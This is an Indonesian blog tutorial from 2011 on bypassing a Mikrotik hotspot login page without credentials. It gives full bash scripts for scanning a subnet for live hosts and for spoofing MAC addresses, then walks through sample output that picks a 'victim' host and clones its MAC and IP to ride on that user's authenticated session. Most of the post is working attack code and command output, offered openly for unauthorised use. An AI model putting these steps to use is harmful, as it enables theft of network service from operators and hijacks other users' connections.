Pages

19 April 2011

Bypass Mikrotik Hotspot Login Page di Linux

Pada saat kita ingin menikmati layanan internet baik di kampus, hotel, cafe, dan tempat umum lainya, Biasanya kita akan di redirect atau dialihkan terlebih dahulu ke halaman login sebelum bisa koneksi internet. proses tersebut disebut proses authentikasi sebagai kelayakan bahwa anda adalah orang yang berhak atas layanan yang tersedia.

Lalu bagaimana dengan mereka yang tidak punya authentikasi khusus sepertis username dan password ? :p
Tenang ajah, berikut gw jelasin caranya :D

pertama kita masuk ke koneksi jaringan lokal dulu, cari akses point kemudian setup selanjutnya dapatkan alamat ip (dhcp aja)

root@nyubicrew.us:~# ifconfig wlan0 up
root@nyubicrew.us:~# iwlist wlan0 scan | grep ESSID
                    ESSID:"POWER RANGERS @SERVER 05"
                    ESSID:"802.11g-SSID"
root@nyubicrew.us:~# iwconfig wlan0 ESSID "802.11g-SSID"
root@nyubicrew.us:~# dhclient wlan0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/wlan0/00:a4:15:af:4a:f1 
Sending on   LPF/wlan0/00:a4:15:af:4a:f1
Sending on   Socket/fallback
DHCPNAK from 192.168.88.1
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.88.135 from 192.168.88.1
DHCPREQUEST of 192.168.88.135 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.88.135 from 192.168.88.1
bound to 192.168.88.135 -- renewal in 20738 seconds.
Ok, sekarang kita sudah konek ke jaringan dengan alamat ip 192.168.88.135, kita check dulu koneksi ke routernya
root@nyubicrew.us:~# ping 192.168.88.1
PING 192.168.88.1 (192.168.88.1) 56(84) bytes of data.
64 bytes from 192.168.88.1: icmp_seq=1 ttl=64 time=2350 ms
64 bytes from 192.168.88.1: icmp_seq=2 ttl=64 time=1633 ms
Ok, seep....sekarang kita cari MAC Address target yang akan kita cloning :)
saya pake tools buatan om Agus Bimantoro a.k.a abi71 berikut scriptnya :)

#!/bin/bash
#------------------------------------------------------------------------------------
#scan-ip.sh v.1.0
#written by aBi71 juli-2010
#l0g[dot]bima[at]gmail[dot]com
#http://abi71.wordpress.com, http://projects.gxrg.org
#credits: [G]gunadarma[X]xmalang[R]research[G]group 
#license: GPL (Gnu public license)
#scan-ip is a simple bash script for network scanner, only used for class C networks.
#with this script you can find a live host in the network.
#------------------------------------------------------------------------------------
#--------- set color ---------
white='\033[1;37m'
red='\033[0;31;1;31m'
yellow='\033[1;33m'
green='\033[0;32;1;32m'
blue='\033[1;34m'
default='\033[0m'
#--------- function help ---------
function display_help (){
echo -e "${white}Usage: $0  [ip_start] [ip_end] 
Options: 
   -h    Display usage information
   -m    Include MAC address

option -m (include MAC address), only used for super users (eg. root) !!!

Please visit 
Report bugs to ${default}"
exit 0
}
#---------- console usage  ----------
if [ $# -lt 1 ]; then
display_help
else
case $1 in
         -h)
            echo -e "${white}Example: $0 125.160.119.30 125.160.119.71 
         $0 -m 192.168.1.20 192.168.1.55 wlan0${default}"
            exit 0
            ;;
         -m)       
            include_mac=yes    
             case $2 in
                 *.*.*.*) 
                         ip_start=$2
                          case $3 in
                              *.*.*.*)
                                      ip_end=$3
                                          case $4 in
                                                 *)
                                                   iface=$4
                                                 ;;
                                          esac
                                      ;;
                                *.*.*)
                                      display_help 
                                      ;;
                                  *.*)
                                      display_help
                                    ;;
                                 *) 
                                      display_help
                                    ;;
                      esac
                         ;;
                   *.*.*)
                         display_help
                         ;;
                     *.*)
                         display_help
                         ;;
                       *) 
                         display_help
                         ;;         
            esac
            ;;
    *.*.*.*)
            ip_start=$1
             case $2 in
                 *.*.*.*)
                         ip_end=$2
                         ;;
                   *.*.*)
                         display_help
                         ;;
                     *.*)
                         display_help
                         ;;
                       *) 
                         display_help
                         ;;
             esac
               ;;
      *.*.*)
            display_help
            ;;
        *.*)
            display_help
            ;;
          *) 
            display_help
            ;;         
esac
fi
#---------- set variable ---------- 
who_use=`whoami`
ip_host1=$(echo $ip_start | sed 's/\./ /g' | awk '{print $4}')
ip_host2=$(echo $ip_end | sed 's/\./ /g' | awk '{print $4}')
ip_class_c1=$(echo $ip_start | sed 's/\./ /g' | awk '{print $1,$2,$3}')
ip_class_c2=$(echo $ip_end | sed 's/\./ /g' | awk '{print $1,$2,$3}')
scan_start=$(date +%H\:%M\:%S)
#---------- check ----------
if [ "$ip_class_c1" = "$ip_class_c2" ] && [ "$ip_host1" -le "$ip_host2" ]; then 
     ip_class_c=$(echo $ip_start | sed 's/\./ /g' | awk '{print $1,$2,$3}')
     gateway=$(netstat -nr | grep "$iface" | grep "UG" | awk '{print $2}' | sed 's/\./ /g' | awk '{print $1"."$2"."$3}')
     echo $gateway > /tmp/.our_ip
     touch /tmp/.ip_list.sh
     echo "#!/bin/bash" > /tmp/.ip_list.sh
else
     display_help
fi
#----------scan process ----------
echo -n -e "${blue}[+]${default} ${white}scanning${default}"
while [ "$ip_host1" -le "$ip_host2" ]; do
  echo -n -e "${white}.${default}"
  join_ip_class_host=$(echo $ip_class_c $ip_host1 | sed 's/\ /./g')
  if [ "$include_mac" != "yes" ]; then
     ip_ping=$(ping -q -w 1 $join_ip_class_host | grep "avg" | sed 's/\// /g' | sed 's/\./ /g'  | awk '{print $8}' &)
        if [ "$ip_ping" != "" ]; then              
           echo "echo -e '${white}$join_ip_class_host ${default} ${green}alive${default}'" >> /tmp/.ip_list.sh
    let count_iplive++ 
             else 
           echo "echo -e '${white}$join_ip_class_host${default} ${red} timeout${default}'" >> /tmp/.ip_list.sh
    let count_ipdead++
        fi
      else if [ "$who_use" = "root" ]; then
                 if [ "$iface" = "" ] || [ "$gateway" = "" ]; then
                    echo -e "\n${red}[!]${default} ${white}Inactive network cards, Please try again and make sure you have an interface with the correct insert.${default}\n"
                    $0 -h
                    exit 0
                 fi
             our_ip=$(ifconfig -a | grep -f /tmp/.our_ip | sed 's/\:/ /g' | awk '{print $3}')
             arp_ping=$(arping -f -c 1 -I $iface -s $our_ip $join_ip_class_host | grep "reply" | awk '{print $4" at "$5}' &)
                 if [ "$arp_ping" != "" ]; then              
                    echo "echo -e '${white}$arp_ping ${default}${green}alive${default}'" >> /tmp/.ip_list.sh
             let count_iplive++ 
                  else 
                    echo "echo -e '${white}$join_ip_class_host at [00:00:00:00:00:00]${default}${red} timeout${default}'" >> /tmp/.ip_list.sh
             let count_ipdead++
                 fi
      else
         echo -n -e "\n${red}[!]${default} ${white}Sorry you can't used this options, so running it may require superuser privileges (eg. root).${default}\n"
         exit 0
      fi 
  fi
  let process++
  let ip_host1++
done
#---------- scanned list ----------
scan_end=$(date +%H\:%M\:%S)
echo -e "\n${green}                              _       
    ___  ___ __ _ _ __       (_)_ __  
   / __|/ __/ _' | '_ \ _____| | '_ \ 
   \__ \ (_| (_| | | | |_____| | |_) |
   |___/\___\__,_|_| |_|     |_| .__/ 
    ${yellow}version 1.0${default}                ${green}|_|${default}    
${default}"
echo -e "${green}--${default} ${yellow}scan-ip.sh v.1.0${default} ${green}--------------------------${default}"
echo -e "${yellow}IP range:${default} ${white}$ip_start${default} ${yellow}to${default} ${white}$ip_end${default}"
echo -e "${yellow}Started:${default} ${white}$scan_start${default}"
echo -e "${yellow}Ended:${default} ${white}$scan_end${default}"
echo -e "${yellow}IP live:${default} ${white}$count_iplive${default}"
echo -e "${yellow}IP dead:${default} ${white}$count_ipdead${default}"
echo -e "${yellow}Total scan:${default} ${white}`expr $count_iplive + $count_ipdead`${default}"
echo -e "${yellow}Scanned on host:${default} 
`bash /tmp/.ip_list.sh`"
echo -e "${yellow}Speed scanned:${default} ${white}`echo $(echo $scan_end | sed 's/\:/ /g' | sed 's/ //g')-$(echo $scan_start | sed 's/\:/ /g' | sed 's/ //g') | bc` second${default}"
echo -e "${green}----------------------------------------------${default}"
echo -e "                          ${yellow}(c) July 2010 - GXRG ${default}"
#--------- clear created file ---------
rm /tmp/.ip_list.sh && rm /tmp/.our_ip
exit 0

Download file scriptnya dan jangan lupa chmod +x scan-ip.sh biar mudah tuk dieksekusi di mesin *nix anda.

lalu scan ipnya denga command

./scan-ip.sh  [ip_start] [ip_end] 
setelah itu akan muncul beberapa ip address yg hidup atau live lakukan ping ke ip address tersebut. Saya ambil contoh : Ip address 192.168.88.201

root@nyubicrew.us:~# ping 192.168.88.201
PING 192.168.88.201 (192.168.88.201) 56(84) bytes of data.
64 bytes from 192.168.88.201: icmp_seq=1 ttl=128 time=170 ms
64 bytes from 192.168.88.201: icmp_seq=2 ttl=128 time=26.8 ms
Ok, sekarang cr tau MAC Address dengan melihat table arp

root@nyubicrew.us:~# arp -a
? (192.168.88.201) at 00:21:5c:3a:de:f1 [ether] on wlan0
? (192.168.88.1) at aa:00:04:00:0a:04 [ether] on wlan0
seeppp!! kita sudah dapet alamat mac 00:21:5c:3a:de:f1 dari host 192.168.88.201
selanjutnya matikan interface kemudian ganti alamat mac kita dengan alamat mac korban menggunakan tools
macfacked buatan om Agus Bimantoro a.k.a abi71 ( Ampunnn om saya pake toolsnya lagi xixixixi :D )
berikut scriptnya

#!/bin/bash
#------------------------------------------------------------------------------------
#macfaked.sh v.0.1
#written by aBi71 Sept-2010
#l0g[dot]bima[at]gmail[dot]com
#http://abi71.wordpress.com, http://projects.gxrg.org
#credits: [G]gunadarma [X]xmalang [R]research [G]groups
#license: Licensed under the GNU General Public License
#------------------------------------------------------------------------------------
#Greatz to GXRG linux team.
#
#DESC: This tools is a simple bash script for changing mac address.
#

faked=True
whouse=`whoami`

function display_help (){
echo -e "macfaked 0.1 by aBi71 

Usage: $0  [interface]

Ex: ./macfaked.sh -r eth0
./macfaked.sh -m 00:11:22:33:44:55 wlan0

Options:
-r    random mac address
-m    mac address

Please visit "
exit 0
}

if [ "$whouse" == "root" ]; then
while [ "$faked" == "True" ]; do
#variable random
a=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
b=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
c=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
d=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
e=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
f=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
if [ $# -lt 1 ]; then
display_help
elif [ "$1" == "-r" ] && [ "$2" != "" ]; then
down_iface=$(ifconfig $2 down 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$down_iface" == "" ]; then
before=$(ifconfig $2 | grep HWaddr | awk '{print $5}')
mac_changer=$(ifconfig $2 hw ether $a:$b:$c:$d:$e:$f 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$mac_changer" == "" ]; then
echo "Changed: [$before]  ->  [$a:$b:$c:$d:$e:$f]"
faked=False
fi
else
echo "$2: No such device."
faked=False
fi
elif [ "$1" == "-m" ] && [ "$2" != "" ] && [ "$3" != "" ]; then
down_iface=$(ifconfig $3 down 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$down_iface" == "" ]; then
before=$(ifconfig $3 | grep HWaddr | awk '{print $5}')
macAddress=$(echo $2 > /tmp/macchange.log ;wc /tmp/macchange.log | awk '{print $3}')
if [ "$macAddress" == "18" ]; then
mac_changer=$(ifconfig $3 hw ether $2 2> /tmp/macchange.log; cat /tmp/macchange.log)
else
mac_changer=failed
fi

if [ "$mac_changer" == "" ] && [ "$macAddress" == "18" ] ; then
echo "Changed: [$before]  ->  [$2]"
faked=False
else
echo "[!] Cannot assign requested address, please try again."
faked=False
fi

else
echo "$3: No such device."
faked=False
fi
else
display_help
fi
done
rm /tmp/macfaked.log 2> /dev/null
rm /tmp/macchange.log 2> /dev/null
else
echo "[!] You must be root."
fi
Ok, let's try this c0de :D 
root@nyubicrew.us:~#./macfaked -m 00:21:5c:3a:de:f1 wlan0 
changed: [00:a4:15:af:4a:f1] -> [00:21:5c:3a:de:f1] 
root@nyubicrew.us:~# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:21:5c:3a:de:f1
          inet addr:192.168.88.201  Bcast:192.168.88.255  Mask:255.255.255.0
 
Ok, sudah berubah kan :)
sekarang hidupkan interface dan koneksikan kembali, setup alamat ip dengan alamat ip sang korban.
root@nyubicrew.us:~# ifconfig wlan0 up
root@nyubicrew.us:~# iwlist wlan0 scan | grep ESSID
                    ESSID:"POWER RANGERS @SERVER 05"
                    ESSID:"802.11g-SSID"
root@nyubicrew.us:~# iwconfig wlan0 ESSID "802.11g-SSID"
root@nyubicrew.us:~# ifconfig wlan0 192.168.88.201/24
root@nyubicrew.us:~# route add default gw 192.168.88.1

sekarang coba kita lakukan ping ke www.google.co.id

root@nyubicre.us:~# ping google.co.id
PING google.co.id (72.14.254.104) 56(84) bytes of data.
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=1 ttl=55 time=695 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=2 ttl=55 time=76.8 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=3 ttl=55 time=38.6 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=4 ttl=55 time=25.1 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=5 ttl=55 time=27.2 ms
Yess....berhasil....berhasil...berhasil...horeeeeeeeeee :p #dora mode on hahhaa :D
sampai di sini kita sudah bisa menikmati koneksi internet hasil nebeng di MAC Address orang lain.
klo misal yang punya host tadi udah udah offline berarti kita juga ikut off line. namanya juga nebeng kalo 
yang nebeng mau udahan yah kita ikut udahan hehehe :)
Oh iyah...untuk mengganti mac address, kita bisa menggunakan beberapa tools lain seperti macchanger dan sejenisnya
yang kompatible dengan mesin unix :)

Referensi :
http://projects.gxrg.org/?p=170 
http://projects.gxrg.org/?p=261
 
Thank's buat Om Agus Bimantoro a.k.a abi71
atas pinjaman tools nya :D 

0 comments: